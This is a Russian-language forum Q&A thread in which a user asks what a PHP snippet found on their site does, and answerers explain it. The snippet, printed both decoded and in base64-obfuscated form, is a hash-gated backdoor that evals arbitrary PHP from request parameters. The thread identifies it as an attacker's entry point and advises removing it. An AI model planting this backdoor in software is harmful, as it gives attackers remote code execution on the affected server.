Пользователей всего:
517172
Пользователей сегодня:
36
Выплачено ($): |
7`616`728,38 |
Выплат: |
8`124`697 |
Писем прочитано: |
1`025`016`615 |
|
Вопрос #64566
Внимание! В разделе вопрос-ответ запрещается:
- Мат, оскорбления, флуд, реклама
- Сообщения, не являющиеся вопросами/ответами
- Нарушение законодательства РФ
- Попрошайничество в любой форме
|
+1 [20.12.2014 20:18] #705395 | Что делает этот php код Есть вот такой кусок кода, какая логика его работы? что делает, что вызывает...
if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == 'd01f6218646cc9dde3794e22d3d1985e') && isset($_REQUEST['php_code'])) { evаl($_REQUEST['php_code']); exit(); }
| Раздел: Программирование, последний комментарий: 20.12.2014 20:47 Вопрос закрыт пользователем MiSsiS_IA |
Проголосовали: SHAMAN_UA |
Ответы |
Ответов всего: 3 |
вопрос закрыт |
|
+1 [20.12.2014 20:34] #1376936
позволяет злоумышленнику выполнить сторонний php код
удаляй
|
Проголосовали: SHAMAN_UA |
|
+1 [20.12.2014 20:38] #705395
ну это понятно, оригинальный код выглядит так
evаl(base64_decode('aWYoaXNzZXQoJF9SRVFVRVNUWydjaCddKSAmJiAobWQ1KCRfUkVRVUVTVFsnY2gnXSkg
PT0gJ2QwMWY2MjE4NjQ2Y2M5ZGRlMzc5NGUyMmQzZDE5ODVlJykgJiYgaXNzZXQoJF9SRVFVRVNUWydwaHBfY29kZS
ddKSkgeyBldmFsKCRfUkVRVUVTVFsncGhwX2NvZGUnXSk7IGV4aXQoKTsgfQ=='));
а это я уже раскодированый вариант кинул, просто хотелось знать, что конкретно он делал
|
Проголосовали: SHAMAN_UA |
|
+8 [20.12.2014 20:47] #2126824
Если(if) определена или существует(isset) переменная ch массива $_REQUEST ($_REQUEST['ch']) и (&&) md5-хэш этой
переменной равен определенному хэшу(md5($_REQUEST['ch']) == 'd01f6218646cc9dde3794e22d3d1985e') ,
а также определена (isset) переменная php_code масива $_REQUEST ($_REQUEST['php_code']),
то выполняется код, который содержится в переменной php_code
и выполняется выход из скрипта(exit();)(то бишь скрипт не выводится в браузер)
|
Проголосовали: goningtbp, #2172053, SHAMAN_UA, #1376936, #1982336, Janco, #874636, TinyMouse |
|
|